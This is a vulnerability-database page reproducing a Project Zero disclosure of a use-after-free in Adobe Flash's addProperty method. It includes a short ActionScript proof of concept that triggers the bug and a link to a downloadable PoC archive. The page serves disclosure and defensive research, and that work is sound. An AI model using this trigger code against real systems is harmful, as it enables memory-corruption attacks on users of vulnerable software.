Lucene search
K

Adobe Flash - addProperty Use-After-Free

🗓️ 17 May 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 34 Views

Adobe Flash use-after-free vulnerability in addProperty metho

Related
Code
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=801
 
There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined, and the watch deleted the MovieClip, it is used after it is freed.
 
A minimal PoC follows:
 
var t = this.createEmptyMovieClip( "t", 1);
t.watch("a", func);
t.addProperty("a", func, func);
 
function func(){
     
    trace("a");
     
    }
 
A sample fla and swf are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39830.zip

#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 May 2016 00:00Current
8.8High risk
Vulners AI Score8.8
EPSS0.65591
34